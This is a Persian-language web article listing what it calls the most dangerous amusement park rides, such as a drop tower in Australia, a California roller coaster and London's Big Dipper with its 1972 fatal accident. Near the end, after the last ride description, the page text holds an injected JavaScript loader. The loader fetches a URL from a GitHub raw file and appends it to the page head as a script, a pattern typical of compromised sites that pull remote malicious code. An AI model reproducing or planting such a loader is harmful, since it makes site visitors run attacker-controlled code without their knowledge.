خطرناک ترین دستگاه شهربازی ها

  • شهربازی ها دو مدل باز و سرپوشیده دارد و مجهز به مجموعه‌ای از وسایل شهربازی مانند چرخ و فلک، تاب، کشتی صبا، اتاق وحشت و… برای تفریحِ کودکان و بزرگسالان است. در واقع، در شهربازی‌ها امکانات سرگرم‌کننده‌ی‌ بیشتری نسبت به پارک‌های ساده و یا فضاهای سبزِ داخل شهر فراهم است. یکی از مهم‌ترین تفاوت‌های بارز شهربازی های سرپوشیده با شهربازی های روباز، این است که اغلب در مکان‌های سر پوشیده، تعداد زیادی ماشین‌های الکترونیکی و بازی‌های رایانه‌ای وجود دارد. وسیله‌های بزرگ‌تر شهربازی معمولاً در شهربازی های روباز قرار دارند. بعضی از این وسایل در شمار خطرناک‌ترین وسیله‌های شهربازی هستند که در این مطلب آن‌ها را معرفی می‌کنیم.

    شهربازی‌ها چه نقشی در سرگرم کردن مردم دارند؟

    در دنیای امروز شهربازی‌ها نقش مهمی در تخلیه‌ی هیجان و استرس مردم دارند. نقشی که شهربازی‌ها در تولید آدرنالین دارند، شبیه فیلم‌ها و ادبیاتِ ژانر وحشت است. شهر‌بازی‌ها بخش مهمی از صنعت تفریح و سرگرمی کشورها به حساب می‌آیند. اگر نگاهی کوتاه به کشور‌های توسعه یافته بیندازیم، متوجه خواهیم شد که بخش قابل توجهی از وسایل تفریحی مردم را خطرناک‌ترین وسیله‌های شهربازی‌ تشکیل می‌دهد و استفاده از این محصولات، هیجان نهفته در وجود شهروندان را آزاد کرده و به آرامش آن‌ها کمک به‌سزایی می‌کند.

    شهربازی ها

    نگاه کوتاهی به شهربازی‌ها

    وقتی در مورد شهربازی‌های روباز حرف می‌زنیم بدون شک اولین چیزی که به ذهن متبادر می‌شود، چرخ و فلک‌های بزرگ، ترن هوایی و ماشین‌های برقی است که در یک محوطه‌ی بزرگ در کنار هم قرار گرفته‌اند. در عموم شهربازی‌ها نور و رنگ‌های مختلف چشمان هر بیننده‌‌ای را به خود جلب خواهد کرد. معمولا، در شهربازی‌های روباز، وسایل سنگین و فوق‌سنگین وجود دارند که اغلب جزء خطرناک‌ترین وسیله‌های شهربازی محسوب می‌شوند.

    بسیاری ازتجهیزات شهربازی را انواع ماشین‌های الکترونیکی و گیمی تشکیل داده است که در ابعاد و اشکال هیجان‌‌انگیزی طراحی شده‌اند و تنوع بالایی دارند. از مهم‌ترین لوازم الکترونیکی می‌توان به دستگاه‌های شبیه‌ساز، واقعیت مجازی و اتاق‌های لیزر اشاره کرد. از آن‌جایی که بسیاری از شهربازی‌های سرپوشیده در مراکز خرید ساخته شده‌اند، مهندسان در طراحی این نوع فضاها باید به محدودیت ارتفاع و محدودیت وزنی وسایل بازی توجه کنند تا از وقوع خطر‌های احتمالی جلوگیری شود. امروزه، یکی از مهیج‌ترین و مدرن‌ترین وسایل شهربازی سرپوشیده، تجهیزات VR هستند. شبیه‌ساز ترن هوایی، شبیه‌ساز پرواز و… مخاطبان زیادی را به وسایل شهربازی‌های سرپوشیده کشانده است.

    در ترسناک‌ترین شهربازی‌های دنیا چه می‌گذرد؟

    امروزه مردم به دنبال فرصتی هستند تا هیجان و استرس روزمره‌ی خود را تخلیه کنند. تجربه‌ی خطرناک‌ترین وسیله‌های شهربازی شما را به لذت، ترس و هیجان می‌رساند؛ به حدی که استفاده از بعضی وسایل شهربازی موجب تپش قلب و لرزش دست و پای شما خواهد شد! ترس و هیجانِ به جا مانده از تجربه‌ی وسایل خطرناک شهربازی، ممکن است مدت‌ها شما را رها نکند! بهتر است اگر روحیه‌ی چنین تجربیاتی را ندارید، از این تجهیزات استفاده نکنید، زیرا ممکن است به سببِ ماندگاریِ تأثیرات روانیِ ترس، کارتان به مشاوره بکشد!

    در ادامه شما را با بعضی از هیجان انگیز‌ترین و ترسناک‌ترین وسایل شهربازی آشنا می‌کنیم.

    نگاهی به برج وحشت در استرالیا

    برج وحشت استرالیا یک قطار است که تا ارتفاع 129 متری(معادل یک ساختمان 38 طبقه‌ای) بالا می‌رود. هنگامی‌که سوار برج وحشت می‌شوید به آرامی تا ارتفاع 129 متری بالا می‌روید که ممکن است در ابتدا خیلی هیجان‌انگیز به نظر نرسد ولی… درست در انتهای بلندی با سرعت 160 کیلومتر بر ساعت سقوط خواهید کرد! برای ساخت این وسیله تقریبا 16 میلیون دلار هزینه شده است و می‌توان گفت جزو خطرناک‌ترین وسیله‌های شهربازی به حساب می‌آید.

    ترن هوایی غول پیکر در کالیفرنیا

    این ترن هوایی یکی دیگر از وسایل مهیج شهربازی است. چیزی که این ترن هوایی را از بقیه‌ی وسایل شهربازی متفاوت می‌کند، چرخش‌ها و لرزش‌های زیاد آن است. به همین دلیل، استفاده از این وسیله‌ی شهربازی ترسناک به کسانی که بیماری قلبی دارند، توصیه نمی‌شود. رولرکوستر کالیفرنیا، یکی دیگر از خطرناک‌ترین وسیله‌های شهربازی در دنیا است.‌‌‌‌‌

    گرد باد شیطان صفت در آمریکا

    اگر بخواهیم این وسیله‌ی شهربازی را شرح بدهیم، باید گفت این گردباد ترکیب کاملی از دو وسیله‌ی ترن هوایی و سقوط آزاد است و مناسب بالا بردنِ آدرنالین خون شما تا بالاترین سطح است. گردباد شیطان تا ارتفاع 66 متری بالا می‌رود و با سرعت خیلی زیاد در محور 450 درجه‌ای می‌چرخد.

    ترن هوایی BIG DEEPER در انگلستان

    یکی از معروف‌ترین و گران‌ترین شهربازی های دنیا در شهر لندن واقع شده است. شهربازی بتر سی فان فیر، در سال 1858 احداث شد و مجهز به دستگاه‌های شهربازی بسیاری است که توجه هر مسافری را به خود جلب می‌کند.

    در سال 1951 وسیله‌ای مرگبار و هیجان‌انگیز به نام بیگ دیپر، در زمان بسیار کوتاهی تبدیل به یکی از معروف‌ترین جاذبه‌‌های گردشگری شد. ارتفاع این ترن هوایی حدودا 15 متر بود و تا سال 1972 همچنان به عنوان یک ترن هوایی محبوب مورد استفاده قرار می‌گرفت. ولی متاسفانه، در همان سال، یکی از واگن‌ها در حین اوج گرفتن سقوط کرد که این حادثه موجب مرگ 5 نفر شد. پس از این حادثه‌ی دلخراش، مسئولان پارک تصمیم گرفتند این دستگاه را برای همیشه از کار بیندازند. این ترن هوایی از خطرناک‌ترین وسیله‌های شهربازی در دنیاست.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید